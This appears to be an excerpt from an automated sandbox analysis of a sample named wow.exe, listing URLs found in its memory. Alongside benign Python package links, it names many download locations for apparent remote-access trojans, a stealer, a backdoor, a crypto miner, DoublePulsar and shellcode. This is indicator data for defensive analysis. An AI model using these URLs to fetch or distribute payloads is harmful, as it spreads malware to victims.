                            Source: wow.exe, 00000000.00000003.2188108431.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/issues
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/hynek
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/hynek).
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/xmrig/xmrig/releases/download/v6.10.0/xmrig-6.10.0-linux-static-x64.tar.gz
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164303165.0000028D65E21000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164429508.0000028D65E21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hynek.me/articles/import-attrs/)
                            Source: wow.exe, 00000000.00000003.2188108431.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/badge/skeleton-2024-informational
                            Source: wow.exe, 00000000.00000003.2188108431.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/charliermarsh/ruff/main/assets
                            Source: wow.exe, 00000000.00000003.2188108431.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/pyversions/importlib_metadata.svg
                            Source: wow.exe, 00000000.00000003.2166979639.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
                            Source: wow.exe, 00000000.00000003.2188108431.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/importlib_metadata.svg
                            Source: wow.exe, 00000000.00000003.2184321491.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/pyreadline3)
                            Source: wow.exe, 00000000.00000003.2188108431.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importlib-metadata.readthedocs.io/
                            Source: wow.exe, 00000000.00000003.2188108431.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importlib-metadata.readthedocs.io/en/latest/?badge=latest
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klaviyo.com/
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F90000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://linkvilleplayers.org/wp-admin/Server.txt
                            Source: wow.exe, 00000000.00000003.2166979639.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164303165.0000028D65E21000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164429508.0000028D65E21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0649/)
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164303165.0000028D65E21000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164429508.0000028D65E21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0749/)-implementing
                            Source: wow.exe, 00000000.00000003.2184321491.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pepy.tech/project/pyreadline3)
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F90000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pns.org.pk/crt/xe
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164303165.0000028D65E21000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164429508.0000028D65E21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/attrs/)
                            Source: wow.exe, 00000000.00000003.2166979639.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/cryptography/
                            Source: wow.exe, 00000000.00000003.2188108431.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/importlib_metadata
                            Source: wow.exe, 00000000.00000003.2184321491.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/pyreadline3/)
                            Source: wow.exe, 00000000.00000003.2189433630.0000028D65E18000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2189433630.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/setuptools/
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/AI-Scanner/bin/refs/heads/main/SGVP%20Client%20System.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/AzureRex/napewnonievoiderhook/refs/heads/main/sharpmonoinjector.ex
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Babskai/vir-s/refs/heads/main/AsyncClient.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/BlazedBottle/rat/refs/heads/main/Client-built-Playit.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/EarthSetup/firtshopacc/refs/heads/main/TCP.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Hapor2023/quasar/refs/heads/main/x.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/JZMVIP/JZMFREETOOL/main/shell.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/JZMVIP/JZMFREETOOL/refs/heads/main/AsyncClient.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/JZMVIP/JZMFREETOOL/refs/heads/main/shell.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/JackedMicheal/ccenty/refs/heads/main/CrSpoofer.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/LuisPhantom/Vemom/refs/heads/main/Client-built.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/LuisPhantom/Vemom/refs/heads/main/Money.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Realmastercoder69/daww/refs/heads/main/Loader.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/TheRealAstro666/LOLZ/refs/heads/main/Client-built.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/ValOfficial/Client-follower/refs/heads/main/Client-built.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/VideoXfrx/CrealStealer/refs/heads/main/Creal.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Xacker-Volk/JustMyRat/refs/heads/main/NJRAT%20DANGEROUS.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/aavaahanan121/tools/refs/heads/main/fern_wifi_recon%252.34.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/aavaahanan121/tools/refs/heads/main/kali_tools.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/ai-scanner/bin/refs/heads/main/test.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/cfedss/exe/refs/heads/main/Solara_Protect.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/ducminh23/ddosv1/refs/heads/main/ddosziller.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/fengjixuchui/CVE-2022-26810/refs/heads/main/shellcode.bin
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/fuzzbunch/fuzzbunch/master/payloads/Doublepulsar-1.3.1.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/hapor2023/quasar/refs/heads/main/fud2.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/mhemon404/project01/refs/heads/main/system404.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/orospuccocugu/aaaaaa/refs/heads/main/anne.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/ozcanpng/backd00r/refs/heads/main/backd00rhome.exe
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/python-attrs/attrs/main/docs/_static/attrs_logo.svg
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/vash0001/Discord/main/Discordd.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/vash0001/Discord/refs/heads/main/Discord.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/vash0001/Discord/refs/heads/main/Discordd.exe
                            Source: wow.exe, 00000000.00000003.2166979639.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
                            Source: wow.exe, 00000000.00000003.2188108431.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/importlib-metadata/badge/?version=latest
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spaceframe.mobi.space-frame.co.za/agha25.tar
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164303165.0000028D65E21000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164429508.0000028D65E21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/questions/tagged/python-attrs)
                            Source: wow.exe, 00000000.00000003.2184321491.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.pepy.tech/personalized-badge/pyreadline3?period=month&units=international_system&left
                            Source: wow.exe, 00000000.00000003.2184321491.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.pepy.tech/personalized-badge/pyreadline3?period=total&units=international_system&left
                            Source: wow.exe, 00000000.00000003.2184321491.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.pepy.tech/personalized-badge/pyreadline3?period=week&units=international_system&left_
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F90000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tecni-soft.com/ACCESORIOS/PLg/
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F90000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tecni-soft.com/ACCESORIOS/Xqp/
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/?utm_source=lifter&utm_medium=referral&utm_campaign=hynek
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164303165.0000028D65E21000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164429508.0000028D65E21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/?utm_source=lifter&utm_medium=referral&utm_campaign=hynek).
                            Source: wow.exe, 00000000.00000003.2188108431.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/badges/package/pypi/importlib-metadata
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=pypi
                            Source: wow.exe, 00000000.00000003.2188108431.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-importlib-metadata?utm_source=pypi-importlib-metadata&utm
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://travelwithmanta.co.za/r6x7x6rf.zip
                            Source: wow.exe, 00000000.00000003.2189433630.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wheel.readthedocs.io/
                            Source: wow.exe, 00000000.00000003.2189433630.0000028D65E18000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2189433630.0000028D65E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wheel.readthedocs.io/en/stable/news.html
                            Source: wow.exe, 00000009.00000003.2206467033.000001D427ADF000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3094923780.000001D427BF3000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2201703483.000001D428013000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2203869935.000001D427BE6000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3070415917.000001D427ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz
                            Source: wow.exe, 00000000.00000003.2167475013.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/
                            Source: wow.exe, 00000000.00000003.2167564422.0000028D65E21000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2167475013.0000028D65E21000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2167475013.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
                            Source: wow.exe, 00000009.00000003.2540988639.000001D42C340000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2377176921.000001D42C340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apple.com/certificateauthority/0
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164303165.0000028D65E21000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164429508.0000028D65E21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/)
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/FilePreviews.svg
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Klaviyo.svg
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Tidelift.svg
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Variomedia.svg
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/latest/glossary.html#term-dunder-methods)).
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164303165.0000028D65E21000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164429508.0000028D65E21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/latest/names.html)
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/changelog.html
                            Source: wow.exe, 00000000.00000003.2164429508.0000028D65E21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/changelog.html)
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164303165.0000028D65E21000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164429508.0000028D65E21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/comparison.html#customization)
                            Source: wow.exe, 00000000.00000003.2164303165.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164303165.0000028D65E21000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164429508.0000028D65E21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization)
